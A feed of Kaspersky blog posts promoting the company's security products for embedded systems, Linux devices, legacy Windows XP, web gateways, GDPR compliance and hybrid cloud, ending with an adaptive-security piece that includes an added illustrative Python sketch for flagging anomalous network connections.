Oleg Gorobets – Kaspersky official blog (https://www.kaspersky.com/blog)
The Official Blog from Kaspersky covers information to help protect you against viruses, spyware, hackers, spam & other forms of malware.

What embedded systems are and how to protect them | Kaspersky official blog
https://www.kaspersky.com/blog/embedded-systems-features-and-security/50356/ – Tue, 30 Jan 2024 11:00:50 +0000

Although embedded computing systems are crucial business tools for many companies, their security is often overlooked. Systems such as ATMs, payment terminals, vending machines, ticket kiosks, medical computer tomographs, and even automated gas stations handle financial and other confidential data that criminals can use to their advantage. This makes these systems attractive targets for cyberattacks, so protecting them from cyberthreats should be a priority for any company. However, despite their apparent similarity to conventional computers, embedded systems have a number of significant differences that must be considered when developing a security strategy; otherwise, companies may face a range of serious challenges.

Features of embedded systems

Usage model. Unlike a conventional computer, which is typically used by a single employee for a wide range of tasks, an embedded system can have an unlimited number of users, and usually provides a meager set of functions built into the system during its initial creation. Interaction with such systems is often carried out using specific input devices (such as a digital keypad or a touch screen with a narrowly specialized user interface) that do not permit the execution of arbitrary commands and files. Ports for connecting external peripherals to these devices are usually accessible only to technical specialists. Communication with the outside world takes place through the internet and local network; in addition, embedded systems are often used with functionally-limited storage devices such as banking, savings or discount cards. Such systems should in no way be used for reading emails or visiting websites — that way attackers cannot rely on these vectors for infection. However, the significance of network connections is increased. And this is one of the main channels used for attacks on embedded systems; after all, almost all types of embedded systems have a connection to the company’s local network — meaning that once inside this network, attackers can reach these specialized machines. As for ports, the specific physical location of such devices can help a hacker.

Physical location. To facilitate the usage model, the vast majority of devices based on embedded systems are located in public spaces. Typically, device components are protected from unauthorized access by a sturdy steel casing and interaction restrictions. However, all devices require some degree of maintenance, so even those with the most robust encasing need to be openable with a key. And this is where attackers can enter. Having gained access to the hardware part of the device, they can connect a standard mouse and keyboard, a storage device with the malware they want to use, or even an operating system that can allow them to bypass the hacked device’s own OS. In some cases, attackers even connect a single-board computer with which they can hack the system or, for example, analyze commands that make the dispenser issue banknotes to the user. The rest is pretty straightforward: the hacker just needs to introduce their tools into the embedded system and then they can make it do whatever they want — from dispensing money or conducting shadow transactions to stealing user data. Unless, of course, the embedded system is properly protected.

Long-term use and limited system resources. Embedded systems are built for specific, highly specialized tasks, so they usually have only the “necessary and sufficient” level of processing power. Since devices using embedded computer systems often have a long service life, it’s not uncommon to encounter functioning ATMs or cash registers with weak, outdated hardware. From a security standpoint, this can pose a significant problem: such a configuration is clearly not compatible with many of the latest security solutions.

Outdated, vulnerable software. The long life of expensive devices based on embedded systems generates another side effect: outdated software. Often, it’s simply impossible to use a newer OS on a modest system configuration, and current specialized application software may not work on the old OS. And sometimes, the new programs necessary for working with the unique peripherals of the device (cash dispensers, card readers, medical monitoring systems, tomographs, and so on) may simply not exist. The consequence of this is that such systems for which security updates are no longer released are actively targeted by hackers. But finding a solution that will work on an old OS, such as Windows XP, and at the same time protect against current threats is extremely challenging; the vast majority of security product developers have discontinued their support for legacy operating systems.

Weak internet connection. Some devices, such as ATMs, ticket terminals and automatic fuel dispensers, may be located in remote places where there’s no wired internet. Also, wireless network access in such places is usually based on cellular communication, so it may work slowly and with interruptions. Application software is designed for such a scenario; for example, transactions can be serviced asynchronously by a bank — they are performed when the connection allows it. However, many modern security solutions are much more reliant on a stable communication channel. In an effort to reduce deployment time and the size of installed software, they rely heavily upon cloud infrastructure, which means that if the connection is poor their performance may be impacted.

Regulatory requirements. Since the vast majority of embedded systems handle valuable financial and personal data, their operation is regulated by relevant legislation. Though regulatory bodies mandate the presence of reliable protection, its implementation is largely left up to companies; the task is to minimize the risk of an incident occurring while ensuring that detailed logs are recorded for investigation if an incident does occur. Moreover, the list of recommendations may include certain technologies, such as system integrity control, which are simply unavailable in typical endpoint security solutions, or are provided only in server versions.

Seeking a compromise

Summing up, these systems are multi-user, single-task, low-power, and susceptible to specific attack vectors (network connection and/or direct device access). At the same time, they handle extremely valuable data (not necessarily financial data; it could be personal medical information in the case of medical equipment), for which not only confidentiality is important, but also integrity. There may be a number of difficulties regarding the data’s protection, as a typical endpoint security solution will face problems working on weak hardware, and generally won’t work on outdated operating systems, which are still quite common. If such a solution does run, there may be performance issues, and sometimes compatibility issues too (after all, the solution is intended for regular computers).

One of the approaches that many manufacturers of security solutions for such systems have taken is to completely prohibit anything that’s not needed for the device’s main task: application control technology in default-deny mode simply blocks any programs not initially included in the so-called allowlist. In theory, this means you don’t need any threat detection mechanisms; a virus simply won’t run, nor will any other unnecessary program, and such technology requires very few resources — allowing the solution to work even on very weak systems.

However, this approach may be powerless against, for example, code injection into a legal, already running process in memory — which can be achieved through exploiting those same vulnerabilities in outdated software. Techniques developed by hackers to exploit elements of the system itself for malicious purposes often mean that the use of actual malware is reduced to a minimum. Yes, there are also fewer options available to hackers in a weak system, but… a business dependent on embedded systems, such as a bank or retail network, is unlikely to use only devices belonging to just one generation. This gives hackers some room to maneuver. What to do? Should you install different solutions — products based on the default-deny principle on weak systems, and a regular antivirus for workstations on more powerful machines, hoping to avoid compatibility issues? Or try to find a truly universal solution?

Special protection for special devices

If you look at the current security solutions for embedded systems on the market, most vendors offer two options:

  • An “economical” resource-efficient solution that can work on outdated systems but offers simple single-layer protection based on application control technology and default-deny mode. This option usually lacks the means to resist the full range of typical attacks on embedded systems, and is often managed separately from other products in the vendor’s ecosystem, creating additional challenges.
  • A typical endpoint security solution. For newer systems, most manufacturers suggest installing the same solution that protects regular workstations. Undoubtedly, such solutions have an up-to-date stack of security technologies and can be integrated into the vendor’s ecosystem. However, they usually lack certain technologies specifically required for protecting embedded systems. Also, such solutions only work on the latest and most powerful devices, leaving behind still functional but outdated ones.

Even if both options are used simultaneously, the full range of problems cannot be addressed. Moreover, inconsistent management approaches can make the work of IT and security admins much more complicated (especially if solutions from different manufacturers are used).

Based on all this, let’s try to imagine the ideal security solution suitable for a wide range of embedded systems and their use scenarios:

  • The solution should provide the maximum possible level of protection. In today’s world, this means having a stack of various technologies to protect against the range of attack vectors and techniques typically used on embedded systems of all types.
  • The solution should provide maximum protection to systems with different capabilities — both old, low-spec ones, and the newer ones with plenty of computing power and memory. However, since it’s simply impossible to physically run every technology simultaneously on weak hardware, scalability is required. In other words, the solution should allow separate management of protection layers so you can disable unnecessary tools and activate those which provide maximum protection for a specific hardware and use scenario.
  • The solution should support the most popular operating systems used to create embedded systems; that is — at least Windows and Linux.
  • The solution should support outdated OS versions used on embedded systems that are still in operation.
  • The solution should meet regulatory requirements, have recommended technologies in its security stack, and be able to perform detailed event logging in a centralized security event monitoring system (SIEM).
  • The solution should be thoroughly tested for compatibility — at least with typical configurations of different types of embedded systems. Ideally, it should be supplied as part of a software/hardware system all components of which have been tested for compatibility by the manufacturer.
  • The solution should have centralized management — ideally unified with other products in the vendor’s ecosystem to create a comprehensive security system providing monitoring and protection of all levels of the company’s IT infrastructure through a single console.

Kaspersky Embedded Systems Security

Many years ago, before fully understanding what a specialized solution for protecting embedded systems should look like, Kaspersky also attempted to use applications from the Kaspersky Security for Business product line for this task. However, it soon became clear that using a conventional application for the entire range of embedded systems was simply impossible. Therefore, the decision was made to develop a separate solution that could meet the ideal requirements to the maximum extent. The result was the emergence of Kaspersky Embedded Systems Security — initially supporting Windows and later Linux as well.

Our solution offers an exceptionally rare combination in the global market: a multi-layered technological stack for different platforms, very modest system resource requirements, and support for outdated OS versions (down to Windows XP SP2). At the same time, it’s part of Kaspersky’s rich security ecosystem. All of this means that Kaspersky Embedded Systems Security comes very close to the ideal solution that we describe above. You can familiarize yourself with the main features of the product on its webpage; for technical details, you can visit the Kaspersky support site sections dedicated to the product’s applications for Windows and/or Linux.

Protecting for the Linux embedded devices | Kaspersky official blog
https://www.kaspersky.com/blog/embedded-systems-security-linux/48649/ – Tue, 18 Jul 2023 11:36:24 +0000

All sorts of embedded solutions running on Linux-based operating systems are growing in popularity. Large companies around the world, such as Banco do Brasil, are already using embedded systems working under the penguin banner, and specialized exhibitions are flooded with familiar types of interactive equipment under its control. For companies, their implementation promises certain benefits (not least for the reduced cost of OS licenses). But it raises a legitimate question for information security teams: do we protect these devices, and if so, how?

Among IT experts (including cybersecurity gurus), the opinion still lingers that Linux is virus-free and secure by design, and that therefore no additional protection is required. Twenty years ago, sure. But these days that’s a dangerous misconception. Here’s why.

Linux malware: the real state of affairs

Back in the days when Linux was a hobby-horse for enthusiasts and an operating system for servers, cybercriminals did indeed largely ignore it. But with the rising popularity of Linux systems, including OS’s for embedded devices, this situation has changed drastically. Aware that more and more banks, medical institutions, retailers and other large companies are starting to use Linux-based embedded solutions, cybercriminals have been exploring ways to attack them. For example, a pretty potent piece of Linux malware used in attacks on the Latin American financial sector made the news just last year.

APT attacks on Linux systems

Another scenario is when attackers leverage Linux-based systems as a foothold into the corporate perimeter – the IT team might not think to protect an information kiosk that contains no data of value. However, cybercriminals often need a way inside the corporate perimeter in order to launch an APT attack, and an unprotected embedded device is just the ticket. A payment terminal installed in a place accessible to the public, or a cash register with an internet connection in a supermarket hall, may well serve as the entry point for a sophisticated attack.

Specialized security solutions

Additionally, some specialists don’t rush to protect Linux-based embedded systems because they don’t trust the capabilities of security solutions – sometimes they think that some of their features are simply of no use to embedded devices. Why would an ATM need anti-phishing protection, for example, if nobody will open websites or access e-mail there? On the other hand, there are usually no guarantees that basic security solutions for Linux can handle the specifics of embedded devices.

With the release of the specialized application, Kaspersky Embedded Systems Security for Linux, as part of our Kaspersky Embedded Systems Security solution, we aim to address this very issue. It is designed, optimized and tested specifically for Linux-based embedded devices. It guarantees safe device operation, without burdening the OS with unnecessary processes. At the same time, the application can be integrated with SIEM systems and managed both through the command line and from a single unified management console, along with other Kaspersky solutions. You can learn more about Kaspersky Embedded Systems Security here.

Protecting XP after the source code leak | Kaspersky official blog
https://www.kaspersky.com/blog/win-xp-source-code-leaked/37451/ – Mon, 26 Oct 2020 19:31:31 +0000

In late September, news broke that the source code for Windows XP had leaked online. A torrent file for downloading the operating system code was published on an anonymous forum, and it spread webwide quickly. Although Web analytics service StatCounter estimates that fewer than 1% of all computers actually run Windows XP, that still represents millions of devices globally.

Why a Windows XP source code leak is bad news

Microsoft discontinued support for Windows XP way back in 2014, so anyone still using it in 2020 is taking a big risk; Microsoft will never patch the new vulnerabilities that continue to pop up. The company makes one exception: critical bugs that can lead to global incidents. For example, the company determined that the CVE-2017-0144 (exploited by WannaCry) and CVE-2019-0708 vulnerabilities posed such a threat. Less high-profile vulnerabilities can also have very nasty consequences, however.

Leaked source code aggravates the situation by giving potential attackers the opportunity to study the operating system in depth, which likely means more exploitation attempts in the near future. Security experts cannot be at all certain of keeping on top of all of the vulnerabilities cybercriminals discover.

What’s more, the vast majority of modern security solutions run only under current operating systems. That’s largely because the difference between Windows 10 and Windows XP, as well as among the technical specifications of the devices on which they run, is too great for one solution to effectively protect both operating systems.

We are also ending support for the outdated versions of our main solution that can still be used to protect Windows XP, which means companies that can’t or won’t upgrade their operating systems will have to look for alternative means of protection.

Security solution for legacy systems

A source code leak is a sound reason to review all corporate systems and, where possible, upgrade devices from Windows XP to at least Windows 7. However, not all companies can get rid of an outdated operating system just like that. Some require it for compatibility with critical hardware or software; others might simply lack the cash to upgrade everything that needs it.

Fortunately, we have a solution for keeping legacy systems secure: Kaspersky Embedded Systems Security. We initially created it to protect devices, such as ATMs and POS terminals, running Windows Embedded operating systems (including ones based on Windows XP), but the solution protects ordinary computers running XP equally well. As with our flagship technologies for businesses, you can manage Kaspersky Embedded Systems Security centrally from Kaspersky Security Center.

Tips for securing Windows XP devices

If your company’s computer fleet still harbors machines running Windows XP, don’t opt for just any antivirus solution; you need an integrated security approach.

  • Use the latest versions of software that are compatible with the operating system. For example, Chrome has not supported Windows XP since 2016, nor Firefox since 2018. All else being equal, the latter is the better choice;
  • Remove all unnecessary programs — or, better, use Application Control technology to cull the list of processes allowed to run on outdated computers. The set of tasks handled by such devices is usually small, and having an “allow” list of runnable programs greatly complicates matters for cybercriminals;
  • Disconnect old devices from the Internet where possible. Where access is critical, use the most modern of the available browsers;
  • Use a Web gateway to filter external traffic and block unwanted requests from the outside. For that, look no further than Kaspersky Security for Internet Gateways.
Kaspersky Web Traffic Security 2019: Flexible gateway protection | Kaspersky official blog
https://www.kaspersky.com/blog/kwts-appliance/33966/ – Mon, 09 Mar 2020 22:06:57 +0000

Protection from online threats is one of today’s key business challenges. In 2019, one in five Kaspersky users faced at least one malware attack distributed through websites. Modern endpoint security solutions detect and neutralize many online threats. However, in many scenarios, workstation protection is not enough.

These scenarios tend to involve the traditional weakest link, employees. We repeatedly encounter incidents caused by someone disabling a security solution component. When asked why, they typically respond that they found the advice online or thought it wasn’t needed, or even that it was interfering with work. Malware penetration of company infrastructure is often the result of personal devices connecting to the corporate network. And there is always phishing — cybercriminals can trick employees into entering corporate data on a fake website.

It’s most commonly small companies that face such problems because smaller businesses are less likely to devote the resources to regularly train staff or to install and maintain complex solutions that can impose tough restrictions.

The latest update of Kaspersky Web Traffic Security, which appeared late last year, addressed this issue. The solution can now be installed not only in concert with a proxy server that is already part of your infrastructure, but also deployed as a ready-made proxy server with integrated protection. The second option, which can be implemented either as a virtual appliance or as a hardware-based solution, minimizes the cost of deploying and maintaining the Web traffic security system.

Such solutions are usually associated with complex manipulations requiring serious Linux administration skills, but the new version of Kaspersky Web Traffic Security is designed in a way that it can be installed and configured without any knowledge of Linux at all. General network administration skills are enough; configuration wizards and convenient control console menus help with the rest.

What can Kaspersky Web Traffic Security do?

The application allows you to filter traffic at the Internet gateway level — that is, at the entrance and exit of your corporate network. Kaspersky Web Traffic Security:

  • Stops most mass threats before they even reach workstations.
  • Automatically blocks not just malicious, but also phishing Web resources, simply by preventing employees from slipping up.
  • Saves system administrators’ time and worry — there is no need to trawl through alerts on every computer on the network.

Flexible configuration

The updated Kaspersky Web Traffic Security lets you create independent configurations for different networks and manage them from a single console. This is handy for companies that have branches with particular security requirements, as well as for MSPs and other providers that offer cybersecurity services to customers.

Moreover, Kaspersky Web Traffic Security does not conflict with other security solutions for gateways, so even if you use another solution for basic protection, you can add it for maximum security.

Learn more and talk to our experts on the Kaspersky Web Traffic Security page.

Neutralization of Web threats as part of APT defense strategy | Kaspersky official blog
https://www.kaspersky.com/blog/kwts-enterprise-6-1/32128/ – Wed, 22 Jan 2020 21:18:27 +0000

How do cybercriminals get inside corporate infrastructure? Movie plot devices where an infected flash drive is left lying around do occur in real life, but not all that often. Over the past ten years, by and large, the main threat delivery channels have been e-mail and malicious Web pages. With e-mail, everything is fairly clear: a security solution with a decent antiphishing and antivirus engine on the mail server will eliminate most threats. By comparison, Web threats usually get much less attention.

Cybercriminals have long been using the Web for all kinds of attacks — and we don’t just mean phishing pages that steal users’ credentials for online services, or malicious sites that exploit browser vulnerabilities. Advanced attacks aimed at specific targets also use Web threats.

Web threats in targeted attacks

In Securelist’s 2019 APT review, our experts give an example of an APT attack that uses the watering-hole method. In the attack, cybercriminals compromised the website of India’s Centre for Land Warfare Studies (CLAWS), and used it to host a malicious document that distributed a Trojan to gain remote access to the system.

A couple of years ago, another group launched a supply-chain attack, compromising the compilation environment of the developer of a popular application and embedding a malicious module into the product. The infected application, with its bona fide digital signature, was distributed on the developer’s official website for a month.

The above are not isolated cases of Web-threat mechanisms deployed in APT attacks. Cybercriminals are known to study the interests of employees and send them malicious links in messengers or social networks that look like websites likely to appeal to their tastes. Social engineering works wonders on trusting individuals.

Integrated protection

It became obvious to us that to improve protection against targeted attacks, we needed to consider Web threats in the context of other events on the corporate network. Therefore, Kaspersky Web Traffic Security 6.1, released in the run-up to the new year, is integrable with the Kaspersky Anti-Targeted Attack platform. Operating in tandem, they complement each other, beefing up the network’s overall defenses.

It is now possible to set up bidirectional communication between the solution protecting the Web gateway and the solution guarding against targeted threats. First, that lets the gateway-based application send suspicious content for in-depth dynamic analysis. Second, Kaspersky Anti-Targeted Attack also now has an additional source of information from the gateway, enabling the earlier detection of the file components of a complex attack and blocking of malware’s communication with C&C servers, thereby disrupting the targeted attack scenario.

Ideally, integrated protection can be implemented at all levels. This involves setting up a targeted threat defense platform to receive and analyze data from workstations and physical or virtual servers, as well as the mail server. If a threat is detected, the results of its analysis can be forwarded to Kaspersky Web Traffic Security and used to automatically block similar objects (and attempts by them to communicate with the C&C servers) at the gateway level.

See the Kaspersky Web Traffic Security page for more information about our gateway protection application.

A gatekeeper for your network | Kaspersky official blog
https://www.kaspersky.com/blog/proxy-gateway-beta/23549/ – Tue, 21 Aug 2018 16:34:12 +0000

Logically, it is reasonable to start protecting one’s business at the endpoints. After all, most malware families attack personal computers and use exploits for vulnerabilities in workstation software. The thing is, no matter how effective law enforcement may be, you don’t eliminate border control. That’s why we advise that you start protecting endpoints by stopping potential threats way before they are able to get close — on the Internet gateway level.

There are several reasons to do so, but topping the list, Internet gateway protection surpasses the human factor. Modern cybercriminals’ number one technique is social engineering. They use tricks to persuade users to open suspicious links, download malicious files, and even switch off protective systems. Therefore, the less malware that reaches your endpoints, the more secure your network will be.

So, the most logical way to start protecting your network from malicious files and harmful websites is really to implement a security solution that stands at the gates through which data enters your infrastructure: at the level of the Internet gateway, using a proxy server as an integration point.

As you may already suspect, we have our own solution that works exactly that way. It is Kaspersky Security for Internet Gateways, with its core application, Kaspersky Web Traffic Security. In addition to severely lowering risks of human error, our application:

  • Can block 95% of modern malware thanks to its combination of machine-learning-based algorithms and emulative sandboxing;
  • Benefits from global threat intelligence coming from Kaspersky Security Network, which allows it to react to the newest malware as soon as it’s discovered;
  • Allows you to control and secure SSL-encrypted corporate Web traffic;
  • Blocks malicious and phishing websites;
  • Reduces risk of infection and data leaks by using content filtering capabilities;
  • Restricts access to specified categories of Web resources by implementing Web control scenarios.

Even if your gateway already has similar solutions installed, it is worth trying ours as an additional level of protection that can boost detection rate without adding any false positives. Now is the perfect time to try it: The all-new Kaspersky Web Traffic Security is now in its final prerelease stages, giving you a unique chance to participate in its public beta testing program.

GDPR: What it is, and what businesses should do | Kaspersky official blog
https://www.kaspersky.com/blog/gdpr-video/22476/ – Wed, 23 May 2018 19:10:57 +0000

Ongoing digital transformation has carried us right into the data-centric age: personal data is everywhere. Data subjects do not always realize how their data is handled, or who has access to it. What is even worse, organizations are sometimes careless about how they handle this data — and how they bring it online. That creates a surge of opportunities for data hunters of all kinds. The EU General Data Protection Regulation is an attempt to address those problems.

What GDPR is, and how it will help

GDPR suggests an ongoing process focused on ensuring that data subjects have real control over their personally identifiable information — and ensuring companies use it lawfully and handle it securely. It helps give both data controllers and data processors a clearer understanding of their responsibilities.

This regulation is about ensuring that the processes and technologies used for personal data safekeeping follow the Regulation and are effectively implemented. Therefore, compliance is not a one-time task, something that is simply accomplished; you will need to assess and adjust regularly. Compliance lies not just in following the letter of the law but also in taking a practical approach to ensuring data security — which you can accomplish by continuously tuning your processes and countermeasures.

What you can do

Of course, implementing effective cybersecurity technologies does not equal GDPR compliance. However, cybersecurity is among the cornerstones on which this compliance is built. We have some practical advice on how to strengthen it.

  • Start your protection with endpoints (including keeping track of mobile ones); they are likely points of entry for cybercriminals, which can pose a risk even if the endpoints are not directly involved in personal data processing.
  • Use encryption to protect data at rest — and in motion! Ensure the security of your regulated data storage.
  • Add layers of protection to your gateway and e-mail server to reduce the risk posed by the “human factor”.
  • Regularly check your infrastructure for weaknesses before someone else has a chance to find them. Perform penetration tests and security assessments.
  • Know what is happening in your infrastructure. In the event of a breach, your ability to establish the cause may help mitigate other, future risks and demonstrate that you made reasonable efforts to protect data.

We have a broad arsenal of measures that will help reduce the risks of a data breach, prevent security incidents, and deliver enhanced visibility of monitored infrastructure. They can be quite helpful in the quest for protection of personal data. Want to learn more? Please visit the GDPR section of our website.

Protecting a hybrid infrastructure from a single console | Kaspersky official blog https://www.kaspersky.com/blog/hybrid-cloud-rsa/22070/ Tue, 17 Apr 2018 11:00:59 +0000 https://www.kaspersky.com/blog/?p=22070 Ideally, you’d get to design a corporate cybersecurity system from scratch and then just update it from time to time. However, in the real world, that’s hardly ever an option. Change is part of business, and as your business expands in diverse and unanticipated ways, those changes necessitate considerable infrastructure changes — which, in turn, may require different security solutions.

Issue: A very diverse infrastructure

The scenarios are infinite, and flexibility is key. For example, at one moment it might be more convenient to move some of your infrastructure to the cloud, whether for financial reasons or because divisions from multiple countries need access to it. And then, perhaps, you need to outsource a task, which means either giving an outsider access to your network (an added security risk) or launching a working environment in a public cloud, which adds another unknown quantity to your complex infrastructure equation. Not to mention the everyday elements you must juggle: all of the local workstations, and perhaps some virtualized workspaces.

Having a diverse local infrastructure plus your private cloud plus a public cloud (be it Amazon Web Services or Microsoft Azure) results in a very complex cybersecurity system that is often built from multiple, loosely connected parts. Complex systems are hard to administer, and they are more prone to maintenance and security issues.

At some point, you might dream of leaving all the legacy parts behind and implementing a new security solution capable of handling your diverse infrastructure. But that is not always possible, often because of that very diversity. And the fact that public cloud systems have their own rules (no physical access to hardware or to hypervisors) only adds limitations.

Solution: Kaspersky Hybrid Cloud Security

To address this problem, we developed Kaspersky Hybrid Cloud Security, which can handle very diverse infrastructures. It helps administrators protect hybrid cloud infrastructures (the infrastructure you have in your own cloud and in public cloud services, such as AWS or Azure) and provide monitoring and administration through a single console. No matter where your servers are — on your premises, in a third-party data center, or in the private cloud — you will always have total control over their security measures without the need to implement different security solutions for each part.

Kaspersky Hybrid Cloud Security lets you protect servers running Windows Server or Linux OS as well as virtual desktop infrastructure, and it is compatible with the most popular public clouds (Microsoft Azure and Amazon Web Services). In terms of administration of the infrastructure, its best feature is that it is fully compatible with the very same Kaspersky Security Center console that also enables you to administer other Kaspersky Lab security solutions installed on physical workstations, servers, and mobile devices. That makes administration a significantly easier task and strengthens the security of your infrastructure, with its uniformity leaving less room for mistakes.

Kaspersky Hybrid Cloud Security was presented today at the RSA conference. It can be implemented either in a large corporate infrastructure or in the network of a small company. To learn more about this solution and understand the benefits it can bring to your business, please visit our corporate site using the links above.

Adaptive architecture: Key to True Cybersecurity | Kaspersky official blog https://www.kaspersky.com/blog/asa-key-to-true-cybersecurity/6678/ Tue, 21 Mar 2017 21:50:07 +0000 https://kasperskydaily.com/b2b/?p=6678 In our experience at Kaspersky Lab, ensuring True Cybersecurity for enterprise IT infrastructure requires multilayered solutions. By multiple layers we mean not only using overlapping protective technologies or covering different levels of the IT network. We also mean that the range of solutions used should have qualities that allow corporate security to adapt dynamically in line with the ever-changing threat landscape.

Why do we think this approach makes the most sense? Whatever you might think of it, we are participating in a never-ending arms race. By continuously improving protection technologies, we try to make them more effective than the tools and techniques used for cybercriminal activity. But what matters is that we cannot settle for purely reactive measures. To deflect attacks efficiently, we need the flexibility to optimize protection proactively, before new threats appear, rather than only reacting to them.

Moreover, we think that a single super-technology guaranteeing protection from all threats is a utopian dream. Even a new method that demonstrates impressive results shortly after its conception will be effective only until cybercriminals adapt to it.

An effective protection framework is cyclical

We think the most viable security architecture is the one described by Gartner. It is based on a cycle of activities and divided into four key areas: Prevent, Detect, Respond, and Predict. Essentially, it assumes intrusion detection and prevention systems should function in concert with threat analytics. Ideally, this strategy helps to create a cybersecurity system that continuously adapts and responds to the emerging challenges of the digital world.

Here is how this adaptive security model could be deployed.

Prevent

The “Prevent” segment consists, put simply, of technologies that deliver a definitive verdict on whether an object is safe or malicious and block it in the latter case. This segment includes firewalls, signature-based engines, and proactive technologies based on machine learning. They are all, in essence, included in our next-generation endpoint protection products: Kaspersky Security for Business, Kaspersky Security for Virtualization, and others.

These solutions don’t need to be managed by a security expert. Most frequently, such systems are managed by general-purpose IT administrators who can also take care of things like databases or local networks. They need a security solution to be robust and hassle-free.

Such products block up to 99% of threats: not only well-known malware (70%) but also previously unknown malware (29%). But what about the remaining 1% of advanced threats, which are the trickiest and most dangerous, and which inflict the heaviest damage on the businesses they hit?

Detect

Some objects and events can be classified as inherently malicious, and some could be inherently safe. However, such classification is not always enough. Some of them are in the gray zone — for example, advanced threats such as APTs, which go to great lengths to evade or mislead security systems.

To control the gray zone, we need the “Detect” level. Security solutions belonging to this layer do not block threats themselves; they detect and report suspicious activity. Such solutions should be managed not by IT generalists but by skilled infosec professionals.

“Detect” technologies include behavioral analytics systems and dynamic code analyzers. An example is the recently launched Kaspersky Anti-Targeted Attack Platform. Among its features is the Targeted Attack Analyzer, which monitors network events. It is based on an approach we call HuMachine Intelligence: a fusion of Big Data-based threat intelligence, machine learning, and human expertise. Human and machine intelligence work better when they complement each other than when they work separately, and both benefit from the most relevant globally acquired knowledge of the threat landscape. The Targeted Attack Analyzer detects suspicious activity by analyzing the system’s working patterns and comparing them with a ‘normal’ picture. If any activity does not match the usual state of things, the system alerts personnel. The model of normal behavior is built with the help of machine-learning processes running both on Kaspersky Lab servers and on the customer’s premises, so the system knows what is and is not normal in a given environment.

As an example, let’s look at a medium-size company in the trade sector. It does not do business with, say, Vietnam, and none of its employees are Vietnamese. One day a computer on the enterprise network connects to a .vn Web resource in the dead of night. The Targeted Attack Analyzer knows that no one in the organization has ever visited Vietnamese websites. Also, according to the Kaspersky Security Network, no one has ever connected to that server. Therefore, the .vn connection is reason to bring in deeper analysis tools. Of course, it could be entirely innocent and coincidental, but it is abnormal, so it makes sense to double-check the incident.
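Here is an added example of the kind of baseline-versus-deviation check the Vietnam scenario describes. It is illustrative code written for this page, not Kaspersky's product or its algorithm: the proxy-log lines are constructed, the KNOWN_GOOD_HOSTS set is an assumed stand-in for the Kaspersky Security Network reputation lookup the text mentions, and the weights and the investigation threshold are arbitrary choices for the illustration.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed proxy-log excerpt used as the "normal" baseline: ISO timestamp,
# internal workstation, destination host. Invented for this example.
BASELINE_LOG = """\
2017-03-01T09:12:44 ws-acct-03 crm.example.com
2017-03-01T10:03:10 ws-sales-11 supplier.example.co.uk
2017-03-01T14:20:01 ws-acct-03 mail.example.com
2017-03-02T09:45:33 ws-sales-11 bank.example.de
2017-03-02T16:05:12 ws-hr-02 portal.example.com
2017-03-03T11:30:00 ws-sales-11 logistics.example.fr
"""

# Assumed stand-in for a global reputation lookup (the text refers to the
# Kaspersky Security Network); here it is simply a set of hosts taken as known.
KNOWN_GOOD_HOSTS = {
    "crm.example.com", "mail.example.com", "portal.example.com",
    "bank.example.de", "supplier.example.co.uk", "logistics.example.fr",
}

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")
INVESTIGATE_THRESHOLD = 3  # arbitrary; tune against real false-positive rates


def parse_line(line):
    """Return (datetime, workstation, destination) or None for malformed lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return datetime.fromisoformat(m.group(1)), m.group(2), m.group(3)


def tld_of(host):
    """Last DNS label; proper public-suffix handling is out of scope here."""
    return host.rsplit(".", 1)[-1].lower()


def build_baseline(log_text):
    """Learn what 'normal' looks like: TLDs, hosts and hours-of-day seen so far."""
    baseline = {"tlds": Counter(), "hosts": set(), "hours": Counter()}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, _workstation, dest = parsed
        baseline["tlds"][tld_of(dest)] += 1
        baseline["hosts"].add(dest)
        baseline["hours"][ts.hour] += 1
    return baseline


def score_event(line, baseline, known_hosts=KNOWN_GOOD_HOSTS):
    """Score one new connection against the baseline. Returns (score, reasons)."""
    parsed = parse_line(line)
    if parsed is None:
        return 0, ["unparseable line"]
    ts, _workstation, dest = parsed
    score, reasons = 0, []
    if baseline["tlds"][tld_of(dest)] == 0:
        score += 2
        reasons.append(f"TLD .{tld_of(dest)} never contacted by the organisation")
    if dest not in baseline["hosts"]:
        score += 1
        reasons.append("destination host never seen locally")
    if dest not in known_hosts:
        score += 1
        reasons.append("destination unknown to global reputation data")
    if baseline["hours"][ts.hour] == 0:
        score += 1
        reasons.append(f"no baseline activity at hour {ts.hour:02d}")
    return score, reasons


def needs_investigation(line, baseline):
    """True when the deviation is large enough to hand to an analyst."""
    score, _reasons = score_event(line, baseline)
    return score >= INVESTIGATE_THRESHOLD


if __name__ == "__main__":
    base = build_baseline(BASELINE_LOG)
    for candidate in (
        "2017-03-04T02:17:09 ws-acct-03 update-cdn.example.vn",  # the night-time .vn case
        "2017-03-04T10:05:00 ws-hr-02 crm.example.com",          # routine daytime traffic
        "2017-03-04T10:05:00 ws-hr-02 news.example.com",         # new host, familiar TLD
    ):
        print(candidate, "->", score_event(candidate, base))
```

The point of the third candidate is the one the text makes: a previously unseen destination is not, by itself, an incident. It scores below the threshold because the TLD and the hour of day are familiar, whereas the .vn connection at two in the morning accumulates every deviation at once and is escalated.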

Respond

“Respond” is the next logical step in this framework. Here the threat is neutralized with the help of both technologies and services; by the latter we mean the work of analysts who investigate attacks and prepare reports.

Kaspersky Lab offers a wide range of these services, including incident research and malware analysis. In addition, we are working on a toolset to optimize these processes by automating evidence collection, searching for compromised endpoints, employing remote configuration, and more.

Meanwhile, further development of the Kaspersky Anti Targeted Attack platform involves introducing Endpoint Detection and Response capabilities, which would not only greatly enrich detection context but also provide response functionality at the scale of a large enterprise network. It would also give forensic specialists an extended range of data crucial for subsequent incident investigation.

The collected data also helps us to better understand today’s cyberthreat landscape, thus creating more effective protection solutions. This is what the next level is all about.

Predict

Various data feeds, obtained through both automatic acquisition (data on malicious links and files) and by expert analysts (APT research), are indispensable assets that can be used to predict future attacks and attack vectors and thus improve security posture. This data, constantly fed into Kaspersky Lab internal analytical systems, is thoroughly assessed. The results of the analysis are used to improve security mechanisms, including adjustments to machine learning processes.

To improve our technologies, we also use data obtained during penetration testing and application security analysis. Having processed all available information, our technologies can automatically block more threats, which brings us back to the ‘Prevent’ level we started with.

And there you have it: the never-ending cycle of Adaptive Security Architecture. Ideally, it enables us to stay ahead of cybercriminals, creating and improving security systems according to the current state of the threat landscape and preventing huge losses for businesses.

